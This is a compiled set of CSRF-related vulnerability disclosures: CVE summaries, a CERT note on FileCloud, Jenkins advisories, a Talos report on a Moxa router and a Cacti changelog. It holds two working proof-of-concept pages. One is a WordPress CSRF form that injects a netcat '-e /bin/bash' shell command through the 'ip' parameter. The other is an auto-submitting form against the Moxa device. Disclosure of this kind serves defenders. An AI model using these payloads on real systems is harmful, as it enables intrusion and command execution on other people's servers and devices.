The Plainview Activity Monitor plugin before 20180826 for WordPress is vulnerable to OS command injection via shell metacharacters in the ip parameter of a wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools request.

<html>
      
      <body>
      <script>history.pushState('', '', '/')</script>
        <form action="http://localhost:8000/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools" method="POST" enctype="multipart/form-data">
          <input type="hidden" name="ip" value="google.fr| nc -nlvp 127.0.0.1 9999 -e /bin/bash" />
          <input type="hidden" name="lookup" value="Lookup" />
          <input type="submit" value="Submit request" />
        </form>
      </body>
    </html>

CVE-2018-15877: Offensive Security’s Exploit Database Archive

CodeLathe FileCloud, version 13.0.0.32841 and earlier, contains a global cross-site request forgery (CSRF) vulnerability. An attacker can perform actions with the same permissions as a victim user, provided the victim has an active session and is induced to trigger the malicious request.

**CodeLathe FileCloud is vulnerable to cross-site request forgery**

**Vulnerability Note VU#865216**

Original Release Date: 2017-01-13 | Last Revised: 2017-01-13

**Overview**

CodeLathe FileCloud, version 13.0.0.32841 and earlier, is vulnerable to cross-site request forgery (CSRF).

**Description**

**CWE-352****: Cross-Site Request Forgery (CSRF) -** CVE-2016-6578

CodeLathe FileCloud is an "is an Enterprise File Access, Sync and Share solution that runs on-premise." FileCloud, version 13.0.0.32841 and earlier, contains a global cross-site request forgery (CSRF) vulnerability. An attacker can perform actions with the same permissions as a victim user, provided the victim has an active session and is induced to trigger the malicious request.

**Impact**

A remote, unauthenticated attacker may be able to induce an authenticated user into making an unintentional request to the FileCloud server that will be treated as an authentic request.

**Solution**

**Apply an update**

The vendor has released version 14.0 to address this vulnerability. Users are encouraged to view the release notes and update to the latest release.

**Vendor Information**

Filter by content: Additional information available

 Sort by:

  
**CVSS Metrics**

Group

Score

Vector

Base

6.8

AV:N/AC:M/Au:N/C:P/I:P/A:P

Temporal

5.3

E:POC/RL:OF/RC:C

Environmental

4.0

CDP:ND/TD:M/CR:ND/IR:ND/AR:ND

  
**References****Acknowledgements**

Thanks to Stéphane Adamiste for reporting this vulnerability.

This document was written by Joel Land.

**Other Information**

**CVE IDs:**

CVE-2016-6578

**Date Public:**

2017-01-13

**Date First Published:**

2017-01-13

**Date Last Updated:**

2017-01-13 14:32 UTC

**Document Revision:**

7

CVE-2016-6578: CERT/CC Vulnerability Note VU#865216

A path traversal vulnerability exists in Jenkins 2.120 and older, LTS 2.107.2 and older in FilePath.java, SoloFilePathFilter.java that allows malicious agents to read and write arbitrary files on the Jenkins master, bypassing the agent-to-master security subsystem protection.

This advisory announces vulnerabilities in the following Jenkins deliverables:

*   Jenkins (core)
*   Black Duck Hub Plugin
*   Black Duck Hub Plugin
*   gitlab-hook Plugin
*   Groovy Postbuild Plugin

**Descriptions****CLI and UI allow non-admin users to enumerate installed plugins**

**SECURITY-771 / CVE-2018-1000192**

Users with Overall/Read permission were able use the list-plugins CLI command and view the _About Jenkins_ page to list all installed plugins.

Use of the list-plugins CLI command and access to the _About Jenkins_ page now require Overall/Administer permission.

**Users were able to register user names containing control characters**

**SECURITY-786 / CVE-2018-1000193**

The built-in Jenkins user database optionally allows user registration. This feature did not properly sanitize user names, allowing registration of user names containing control characters.

This could be used to confuse administrators (appearing to be a different user) while preventing deletion of such users through the UI.

User registration in the built-in Jenkins user database now limits user names to those containing alphanumeric, dash, and underscore characters. Administrators can customize this restriction by setting the hudson.security.HudsonPrivateSecurityRealm.ID_REGEX system property to a regular expression that will be used instead to determine whether a given user name is valid.

**Path traversal vulnerability in agent to controller security subsystem**

**SECURITY-788 / CVE-2018-1000194**

The agent to controller security subsystem ensures that the Jenkins controller is protected from maliciously configured agents. Learn more.

A path traversal vulnerability allowed agents to escape whitelisted directories to read and write to files they should not be able to access.

Paths are now normalized before performing the access check to ensure they don’t escape allowed directories.

**Users with Overall/Read permission were able to send GET requests to any URL**

**SECURITY-794 / CVE-2018-1000195**

The form validation code for a tool installer improperly checked permissions, allowing any user with Overall/Read permission to submit a HTTP GET request to any user specified URL, and learn whether the response was successful (HTTP 200) or not.

Additionally, this functionality did not require POST requests be used, thereby allowing the above to be performed without direct access to Jenkins via Cross-Site Request Forgery attacks.

The affected form validation code now properly checks permissions, and requires that POST requests be sent to prevent CSRF attacks.

**Gitlab Hook Plugin stores and displays GitLab API token in plain text**

**SECURITY-263 / CVE-2018-1000196**

Gitlab Hook Plugin does not encrypt the Gitlab API token used to access Gitlab. This can be used by users with Jenkins controller file system access to obtain GitHub credentials.

Additionally, the Gitlab API token round-trips in its plaintext form, and is displayed in a regular text field to users with Overall/Administer permission. This exposes the API token to people viewing a Jenkins administrator’s screen, browser extensions, cross-site scripting vulnerabilities, etc.

As of publication of this advisory, there is no fix.

**Black Duck Hub Plugin allowed any user with Overall/Read to read and write its configuration**

**SECURITY-670 / CVE-2018-1000197**

Black Duck Hub Plugin did not perform permission checks for its /descriptorByName/com.blackducksoftware.integration.hub.jenkins.PostBuildHubScan/config.xml API endpoint.

This allowed any user with Overall/Read permission to both read and write the plugin configuration XML.

Black Duck Hub Plugin 3.1.0 and newer requires Overall/Administer permission to access this API.

**XML Exernal Entity processing vulnerability in Black Duck Hub Plugin**

**SECURITY-671 / CVE-2018-1000198**

Black Duck Hub Plugin’s /descriptorByName/com.blackducksoftware.integration.hub.jenkins.PostBuildHubScan/config.xml API endpoint was affected by an XML External Entity (XXE) processing vulnerability. This allowed an attacker with Overall/Read access to have Jenkins parse a maliciously crafted file that uses external entities for extraction of secrets from the Jenkins controller, server-side request forgery, or denial-of-service attacks.

Black Duck Hub Plugin 4.0.0 and newer no longer processes XML External Entities in XML documents submitted to this endpoint.

**Persisted cross-site scripting vulnerability in Groovy Postbuild Plugin**

**SECURITY-821 / CVE-2018-1000202**

Groovy Postbuild Plugin did not properly escape badge content from user input, resulting in a stored cross-site scripting vulnerability.

Groovy Postbuild Plugin 2.4 now properly escapes badge content from user input.

**Severity**

*   SECURITY-263: low
*   SECURITY-670: medium
*   SECURITY-671: high
*   SECURITY-771: medium
*   SECURITY-786: low
*   SECURITY-788: high
*   SECURITY-794: low
*   SECURITY-821: medium

**Affected Versions**

*   Jenkins weekly up to and including 2.120
*   Jenkins LTS up to and including 2.107.2
*   **Black Duck Hub Plugin** up to and including 3.0.3
*   **Black Duck Hub Plugin** up to and including 3.1.0
*   **gitlab-hook Plugin** up to and including 1.4.2
*   **Groovy Postbuild Plugin** up to and including 2.3.1

**Fix**

*   Jenkins weekly should be updated to version 2.121
*   Jenkins LTS should be updated to version 2.107.3
*   **Black Duck Hub Plugin** should be updated to version 3.1.0
*   **Black Duck Hub Plugin** should be updated to version 4.0.0
*   **Groovy Postbuild Plugin** should be updated to version 2.4

These versions include fixes to the vulnerabilities described above. All prior versions are considered to be affected by these vulnerabilities unless otherwise indicated.

As of publication of this advisory, no fixes are available for the following plugins:

*   gitlab-hook Plugin

**Credit**

The Jenkins project would like to thank the reporters for discovering and reporting these vulnerabilities:

*   **Daniel Beck, CloudBees, Inc.** for SECURITY-670
*   **Devin Nusbaum, CloudBees, Inc.** for SECURITY-771
*   **James Nord, CloudBees, Inc.** for SECURITY-671
*   **Jesse Glick, CloudBees, Inc. and Kalle Niemitalo, Procomp Solutions Oy** for SECURITY-788
*   **Steve Marlowe <smarlowe@cisco.com> of Cisco ASIG** for SECURITY-263
*   **Sureshbabu Narvaneni** for SECURITY-786
*   **Thomas de Grenier de Latour** for SECURITY-794

CVE-2018-1000194: Jenkins Security Advisory 2018-05-09

A server-side request forgery vulnerability exists in Jenkins 2.120 and older, LTS 2.107.2 and older in ZipExtractionInstaller.java that allows users with Overall/Read permission to have Jenkins submit a HTTP GET request to an arbitrary URL and learn whether the response is successful (200) or not.

CVE-2018-1000195: Jenkins Security Advisory 2018-05-09

A information exposure vulnerability exists in Jenkins 2.120 and older, LTS 2.107.2 and older in AboutJenkins.java, ListPluginsCommand.java that allows users with Overall/Read access to enumerate all installed plugins.

CVE-2018-1000192: Jenkins Security Advisory 2018-05-09

A improper neutralization of control sequences vulnerability exists in Jenkins 2.120 and older, LTS 2.107.2 and older in HudsonPrivateSecurityRealm.java that allows users to sign up using user names containing control characters that can then appear to have the same name as other users, and cannot be deleted via the UI.

CVE-2018-1000193: Jenkins Security Advisory 2018-05-09

An exploitable cross-site request forgery vulnerability exists in the web server functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted HTTP packet can cause cross-site request forgery. An attacker can create malicious HTML to trigger this vulnerability.

**Summary**

An exploitable cross-site request forgery vulnerability exists in the web server functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted HTTP packet can cause cross-site request forgery. An attacker can create malicious HTML to trigger this vulnerability.

**Tested Versions**

Moxa EDR-810 V4.1 build 17030317

**Product URLs**

https://www.moxa.com/product/EDR-810.htm

**CVSSv3 Score**

8.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

**CWE**

CWE-352 - Cross-Site Request Forgery (CSRF)

**Details**

In order to trigger the CSRF a logged in user needs to visit a page with malicious code on it. The malicious code will be able to do anything the logged in user can do. For example the malicious code could add a user, modify firewall rules, etc. This could also be chained with a command injection to get a root shell on the device. This problem is compounded by the fact that users cannot log out of the device, meaning that a user’s session will remain valid long after they’ve stopped interacting with the device.

**Exploit Proof-of-Concept**

    <html>
      <body>
        <form action="http://192.168.127.254/goform/net_WebPingGetValue" method="POST">
          <input type="hidden" name="pingTmp" value="192.168.127.22" />
          <input type="hidden" name="ifs" value="1" />
          <input type="hidden" name="ip" value="192.168.127.22" />
          <input type="submit" value="Submit request" />
    	</form>
        <script>
          document.forms[0].submit();
        </script>
      </body>
    </html>
    

**Timeline**

2017-11-15 - Vendor Disclosure  
2017-11-19 - Vendor Acknowledged  
2017-12-25 - Vendor provided timeline for fix (Feb 2018)  
2018-01-04 - Timeline pushed to mid-March per vendor  
2018-03-24 - Talos follow up with vendor for release timeline  
2018-03-26 - Timeline pushed to 4/13/18 per vendor  
2018-04-12 - Vendor patched & published new firmware on website  
2018-04-13 - Public Release

Discovered by Carlos Pacho of Cisco Talos.

CVE-2017-12126: TALOS-2017-0478 || Cisco Talos Intelligence Group

Cacti before 1.1.37 has XSS because it makes certain htmlspecialchars calls without the ENT_QUOTES flag (these calls occur when the html_escape function in lib/html.php is not used).

Type

ID

Text

feature

Add a Timeout setting for Remote Agent calls

feature

Add Graphs and Data Sources hyperlinks on Device page

feature

Add One Minute Sampling to the default Data Source Profiles

feature

Add support for DDERIVE and DCOUNTER to Cacti

feature

Add Timezone support for Remote Data Collectors

feature

Allow Adding Aggregate Graphs to a Report

feature

Allow ASCII filepath paths to not be found on settings save

feature

Allow drill down from Graphs to Data Queries or Templates

feature

Allow Import/Export to be hookable

feature

Allow snmpagent to be disabled for very large installs

feature

Allow Top tabs to be Glyphs or Text or both

feature

Big Spanish translation update plus massive QA fixes

feature

Change password page provides visible confirmation of password rules

feature

Do not allow second data source to be added to an SNMP Get data template

feature

Don't allow removal of Data Sources from Data Template once its in use

feature

Inform the primary Cacti administrator of problems by Email

feature

Make all user settings dynamic and allow resetting to default.

feature

Make Graph and Data Source suggested naming more efficient

feature

Make it easy to find Data Query based graphs that have lost indexes

feature

Make Top Tabs use Ajax Callback

feature

Make tree editing responive

feature

New Install/Upgrade user permission to limit access to being able to upgrade

feature

Provide option to debug width errors where output exceeds column width

feature

Removed the Authentication Method of 'None'

feature

Tree automation is now defaulted to on for new install

feature

Update JavaScript library c3.js to version 0.6.8

feature

Update JavaScript library Chart.js to 2.7.3

feature

Update JavaScript library d3.js to version 5.7.0

feature

Update JavaScript library jquery.js to 3.3.1

feature

Update JavaScript library jquery-migrate.js to 3.0.1

feature

Update JavaScript library jquery.tablesorter.js to version 2.30.7

feature

Update JavaScript library jstree.js to 3.3.7

feature

Update JavaScript library screenfull.js to 3.3.3

feature

Update phpmailer to version 6.0.6

feature

Update phpseclib to version 2.0.13

feature

289

Allow external nologin access for Realtime Graphs

feature

553

When display a host, include Aggregated Graphs as well as standard graphs

feature

614

Allow users to duplicate Data Input Methods

feature

973

When creating a new user authenticated via LDAP, attempt to retrieve users email and full name

feature

122

Support a Site Branch Type

feature

1060

Design Enhancement for Large scale Cacti Implementations

feature

1142

Add Site dropdown to the Graphs and Data Source pages

feature

1184

Improve Data Input Methods editability and message handling

feature

1200

Aggregate Graphs can now include COMMENT

feature

1282

Email notification for Automation Network discovery process

feature

1347

Update automation logging to work better

feature

1395

Ensure messages have each new line keep the same prefix in cacti\_log()

feature

1399

Allow 'requires' to include version against a plugin

feature

1400

User settings are now dynamic and can be reset (removed) to return to global settings

feature

1422

Automatically select the next unused data input field when clicking add on data input method

feature

1505

When displaying a graph, provide breadcrumb link to edit device

feature

1527

Update Fontawesome from 4.7 to 5.0.10

feature

1580

Support Drag & Drop for Builtin Report Items

feature

1581

Allow Mass Adding of Graphs to Reports

feature

1584

Allow theme selection when installing

feature

1588

Check that PHP can run a test file

feature

1593

Allow External links to auto refresh

feature

1597

Ensure synchronised files have same attributes as originals

feature

1610

On Unix, redirect error messages to log files when running external scripts

feature

1628

Allow the User to define an initial Automation Network for discovery when installing

feature

1670

Improve Graph Management to show type of source for a graph

feature

1671

When duplicating a Graph Template, properly duplicate Data Query Graph Template Mappings

feature

1677

Default Tree nodes sorting to be inherited

feature

1691

On Graph context menu, add a 'Copy graph' option to copy graph image

feature

1692

Separate option for logging Input Validation issues

feature

1703

On Graph context menu, text is now multi-lingual

feature

1708

Allow the User to override global Automation email recipients at the Automation Network level

feature

1709

Suppress warning from RRDTool when attempting to make updates in the past

feature

1711

Add support for SSL connections to MySQL

feature

1731

Prevent loss of changes by warning user about unsaved items

feature

1734

When displaying a graph, provide more information when error image is displayed (see also #1428)

feature

1763

Enable automatic refresh for Time Graph View

feature

1806

Control low level debug routines via config.php (Develoepr Use)

feature

1819

Provide CLI program to enable graphs to be removed by scripts

feature

1969

Graph previews can now be linked using a host's external id

feature

2006

Introduce new Data Source Profile to handle decade long graphs

feature

2173

Introduce Device and Graph Template Caching to Speed UI

feature

2228

Add Device ID to Device search field

issue

Fix issue with display\_custom\_error\_message() causing problem with system error message handling

issue

Graph List View was not fully responsive

issue

Move Graph removal function to Graph API

issue

On the Data Sources page, if there is no filtered Device and a Data Source is edited, device association is lost

issue

Typo in Dutch translations when an error occurred while downgrading

issue

Unable to display user profile tabs

issue

Verify all Fields not working due to Cacti 1.x upgrade error

issue

186

Cacti does not support jQueryUI 1.12.x

issue

187

Remove the use of jQuery Migrate plugin

issue

948

Do not create a new datasource when adding a new Graph for the same device/field

issue

454

Cacti Re-Index does not resolve index changes properly during re-index

issue

983

Import Template Preview is misleading

issue

1097

When copying template user, newly created user should always be enabled to allow logging in

issue

1097

When copying template user, it should be disable to prevent logging in as template user directly

issue

1174

When display a tree, disable drag and drop unless in edit mode

issue

1298

Display fatal error to prevent issues caused when system log is not writable

issue

1350

When switching an Automation Tree Rule's leaf type, remove invalid Automation Rule Items

issue

1383

CSRF Timeout does not obey session timeout

issue

1408

Update SQL / Backtrace to use new clean\_up\_lines() function

issue

1414

DSSTATS reports incorrectly that a data source does not exist

issue

1420

Fix issues found by Debian package builds

issue

1421

Fix issue when SQL had all bad modes, missing variable warning was generated

issue

1426

Fix issue where remote poller was not using unique filenames when attempting to verify files

issue

1437

Plugin install hover message sometimes shows line breaks rather than formatted text

issue

1454

When using oid\_regexp\_parse, filter indexes to those that match

issue

1473

Recovery Date overwritten by subsequent checks

issue

1494

Unable to Deep Link/Bookmark Trees

issue

1503

Undefined function clearstatscache in DSSTATS

issue

1507

When saving graph settings from the graph page, the graph template id should not be included

issue

1510

New Graphs Undefined Variable $graph\_template\_name

issue

1521

Force boost to be enabled when there are Remote Data Collectors

issue

1528

Saving a device can result in WARNINGS related to string vs array handling

issue

1529

Allow Aggregate Graphs to Sum Bandwidth and Percentile COMMENTS

issue

1543

Graph Preview appends header=false too many times

issue

1553

Poller does not set rrd\_step\_counter correctly if no steps taken

issue

1559

CLI Output Issues due to over escaping

issue

1560

Warning that escapeshellarg() is escaping a null

issue

1567

Technical support - add notification if Cacti and Spine version is different

issue

1574

User templates are not correctly being applied

issue

1589

Installer now checks that the temporary folder is writable

issue

1590

User Admin generates SQL error if user is not part of any groups

issue

1601

Aggregate Graphs can not include some classes of COMMENT

issue

1602

PHP ERROR: Call to undefined function api\_data\_source\_cache\_crc\_update()

issue

1604

Failed to connect to remote collector

issue

1606

Boost debug log not functional

issue

1607

Boost next run time occurs in the past

issue

1608

Possible boost race conditions

issue

1609

Remote pollers update 'stats\_poller' on main poller

issue

1617

Editing a data query results in missing $header variable

issue

1621

Realtime Popup can cause automatic logout

issue

1626

httpd-error.log have message about Fontconfig

issue

1634

Default snmp quick print setting resulting in false poller ASSERTS on some php releases

issue

1651

Check temporary folder has write access during import

issue

1655

Correct Cacti to handle new MySQL 8.0 reserved word \`system\`

issue

1658

Devices drop down should be filtered by Site

issue

1660

Reports based upon Tree don't maintain graph order

issue

1665

Must change password not working for local users when main realm is not local

issue

1669

Console log header grammar issue

issue

1674

Threads and Processes values not migrated to Poller table during upgrade

issue

1676

Allow automation discovery to add the same sysname on different hosts

issue

1682

Slow Select Statement lib/api\_automation.php

issue

1689

Technical Support's RRDTool version should show detected RRD version

issue

1690

Report a warning if the default collation is not utf8mb4\_unicode\_ci

issue

1700

Mail sent without auth causes errors to appear in logs

issue

1710

RRDtool create command causes first update to fail

issue

1721

Console Side Bar not correct on first login

issue

1723

die() messages should include PHP\_EOF for better logging

issue

1726

Poor page performance editing a Graphs Graph Items

issue

1746

Poller with no hosts does not exit until timeout is reached

issue

1761

Graph Management page shows bogus template names

issue

1783

Browser Back button still does not working

issue

1796

Import: Fixed handling of references to objects not included in file

issue

1799

Default User log sort should be date descending

issue

1810

Correct SQL errors with authentication set to no authentication

issue

1839

Dummy cosmetic bug on down device selection option

issue

1841

Data Source Stats table not properly migrated from pre 1.x Cacti plugin

issue

1849

SNMPAgent not sending traps

issue

1852

Reports Preview/Mails show no graphs

issue

1889

Insecure $ENV{ENV} which running setgid

issue

1901

Upgrade from 0.8.8h fails on external\_links statement

issue

1921

Data Query XML field method 'rewrite\_index' does not correctly query for value

issue

1926

Deselecting items should present warning or disable GO button

issue

1948

Device Template should warn about need to re-sync

issue

1953

set\_default\_action() should warn if more than one action provided

issue

1973

SpikeKill Menu does not display properly

issue

1976

Default admin permissions do not allow everything

issue

1982

Certain hooks should occur within api functions rather than UI functions

issue

2002

api\_plugin\_db\_table\_create should support non-string defaults

issue

2012

For kernel 3.2+, "Linux - Memory - Free" should grep for "MemAvailable:", not "MemFree:"

issue

2085

CLOG Regex Parser does not verify registered function exists

issue

2126

api\_device.php generates undefined function poller\_push\_to\_remote\_db\_connect()

issue

2127

Unable to save error when duplicating graph

issue

2135

api\_tree\_lock() and api\_tree\_unlock() forcing redirection incorrectly

issue

2143

export.php Illegal string offset 'method'

issue

2144

Device Management "Status" column does not sort properly

issue

2152

When editing a device, should show disable/enable option

issue

2153

Utilities page issues the wrong hook for tabs

issue

2163

LDAP functions are not consistent

issue

2164

Login page does not remember selected realm

issue

2171

datepicker and timepick translation not available

issue

2178

Header/Footer included more than once

issue

2182

Graph View missing 'html\_graph\_template\_multiselect()' function

issue

2184

html\_host\_filter() does not handle host\_id consequently

issue

2186

Boost generates invalid SQL during on demand update

issue

2188

SNMP timeout errors are being duplicated

issue

2191

i18n\_themes is not properly primed in global\_arrays.php

issue

2202

Can't create more than one graph with add\_graphs.php from one template

issue

2207

Removing Graph Template does not Remove Data Query Associations

issue

2217

cmd.php not handling quoted snmp values properly

issue

2240

SNMP system Data Input Methods should not be modified on import

issue

2241

Spike removal not functional due to Debian packaging

security

1072

Prevent exploitation of Data Input Methods to escalate privileges (CVE-2009-4112)

security

1882

Bypass output validation in select cases

security

2212

Stored XSS in "Website Hostname" field

security

2213

Stored XSS in "Website Hostname" field - Devices

security

2214

Stored XSS in "Vertical Label" field - Graph

security

2215

Stored XSS in "Name" field - Color

unknown

CVE-2018-10061: The Complete RRDTool-based Graphing Solution

Jenkins before versions 2.44 and 2.32.2 is vulnerable to an insufficient permission check. This allows users with permissions to create new items (e.g. jobs) to overwrite existing items they don't have access to (SECURITY-321).

**Use of AES ECB block cipher mode without IV for encrypting secrets**

**SECURITY-304 / CVE-2017-2598**

Secrets such as passwords are typically stored on disk and sent to users as part of some pages in encrypted form. These were encrypted using AES-128 ECB without IV, which exposes Jenkins and the stored secrets to unnecessary risks. Jenkins now encrypts secrets using AES-128 CBC with random IV.

**Items could be created with same name as existing item**

**SECURITY-321 / CVE-2017-2599**

An insufficient permission check allowed users with the permission to create new items (e.g. jobs) to overwrite existing items they don’t have access to. After a Jenkins restart, children of the original item, such as builds, were then accessible in some circumstances.

**Node monitor data could be viewed by low privilege users**

**SECURITY-343 / CVE-2017-2600**

Overall/Read permission was sufficient to access node monitor data via the remote API. These included system configuration and runtime information of these nodes.

**Possible cross-site scripting vulnerability in jQuery bundled with timeline widget**

**SECURITY-349 / CVE-2011-4969**

The Simile timeline widget used on build history pages bundles an outdated jQuery vulnerable to CVE-2011-4969. We were unable to confirm that Jenkins is vulnerable, but updated the jQuery version bundled with the Simile timeline widget anyway.

**Persisted cross-site scripting vulnerability in parameter names and descriptions**

**SECURITY-353 / CVE-2017-2601**

Users with the permission to configure jobs were able to inject JavaScript into parameter names and descriptions.

**Outdated jbcrypt version bundled with Jenkins**

**SECURITY-354 / CVE-2015-0886**

Jenkins bundled an outdated version of jbcrypt that was affected by CVE-2015-0886.

**Pipeline metadata files not excluded in agent-to-controller security subsystem**

**SECURITY-358 / CVE-2017-2602**

The Pipeline suite of plugins stored build metadata in the file program.dat and the directory workflow/. These were not excluded in the agent-to-controller security subsystem and could therefore be written to by malicious agents.

**User data leak in disconnected agents' config.xml API**

**SECURITY-362 / CVE-2017-2603**

Agents that were disconnected by users contained the disconnecting user’s User object in serialized form in the config.xml remote API output. This could leak sensitive data such as API tokens.

**Low privilege users were able to act on administrative monitors**

**SECURITY-371 / CVE-2017-2604**

Administrative monitors are warnings about the system state shown to Jenkins admins. They sometimes provide actions to e.g. automatically address the reported problem, or disable the warning. These actions were not consistently protected by permission checks, thereby allowing low privilege users to act on them.

All administrative monitors now require the user accessing them to be an administrator.

**Re-key admin monitor leaves behind unencrypted credentials in upgraded installations**

**SECURITY-376 / CVE-2017-1000362**

The re-key admin monitor was introduced in Jenkins 1.498 and re-encrypted all secrets in JENKINS\_HOME with a new key. It also created a backup directory with all old secrets, and the key used to encrypt them. These backups were world-readable and not removed afterwards.

Jenkins now deletes the backup directory, if present. Upgrading from before 1.498 will no longer create a backup directory. **Administrators relying on file access permissions in their manually created backups are advised to check them for the directory $JENKINS_HOME/jenkins.security.RekeySecretAdminMonitor/backups, and delete it if present.**

**Internal API allowed access to item names that should not be visible**

**SECURITY-380 / CVE-2017-2606**

The method Jenkins#getItems() included a performance optimization that resulted in all items being returned if the _Logged in users can do anything_ authorization strategy was used, and no access was granted to anonymous users (an option added in Jenkins 2.0). This only affects anonymous users (other users legitimately have access) that were able to get a list of items via an UnprotectedRootAction.

**Persisted cross-site scripting vulnerability in console notes**

**SECURITY-382 / CVE-2017-2607**

Jenkins allows plugins to annotate build logs, adding new content or changing the presentation of existing content while the build is running. Popular examples include the highlighting of sections by Ant Plugin, or the timestamp metadata from Timestamper. Malicious Jenkins users, or users with SCM access, could configure jobs or modify build scripts such that they print serialized console notes that perform cross-site scripting attacks on Jenkins users viewing the build logs.

To prevent this, console notes are now signed by Jenkins when created, and Jenkins will only deserialize correctly signed console notes. **As a side effect, console notes created before updating to a release containing this fix will no longer be deserialized.** To restore the previous (unsafe) behavior, set the system property hudson.console.ConsoleNote.INSECURE to true as described on Features controlled by system properties.

**XStream remote code execution vulnerability**

**SECURITY-383 / CVE-2017-2608**

XStream-based APIs in Jenkins (e.g. /createItem URLs, or POST config.xml remote API) were vulnerable to a remote code execution vulnerability involving the deserialization of various types in javax.imageio.

**Information disclosure vulnerability in search suggestions**

**SECURITY-385 / CVE-2017-2609**

The autocompletion for the search box provided the names of views the current user does not have access to in its suggestions. These suggestions were removed.

**Persisted cross-site scripting vulnerability in search suggestions**

**SECURITY-388 / CVE-2017-2610**

Jenkins allows the creation of users with less-than and greater-than characters in their names. These user names were not escaped when displaying search suggestions, resulting in a cross-site scripting vulnerability.

**Insufficient permission check for periodic processes**

**SECURITY-389 / CVE-2017-2611**

The URLs /workspaceCleanup and /fingerprintCleanup did not perform permission checks, allowing users with read access to Jenkins to trigger these background processes (that are otherwise performed daily), possibly causing additional load on Jenkins controller and agents.

**Low privilege users were able to override JDK download credentials**

**SECURITY-392 / CVE-2017-2612**

Jenkins allows administrators to enter their username and password to the Oracle download site which provides JDKs for download. Users with read access to Jenkins were able to override these credentials, resulting in future builds possibly failing to download a JDK. A permission check has been added.

**User creation CSRF using GET by admins**

**SECURITY-406 / CVE-2017-2613**

When administrators accessed a URL like /user/example via HTTP GET, a user with the ID example was created if it did not exist. While this user record was only retained until restart in most cases, administrators' web browsers could be manipulated to create a large number of user records.

Accessing these URLs now no longer results in a user record getting created, Jenkins will respond with 404 Not Found if no such user exists. When using the internal Jenkins user database, new users can be created via _Manage Jenkins » Manage Users_. To restore the previous (unsafe) behavior, set the system property hudson.model.User.allowUserCreationViaUrl to true as described on Features controlled by system properties.

Tag

#csrf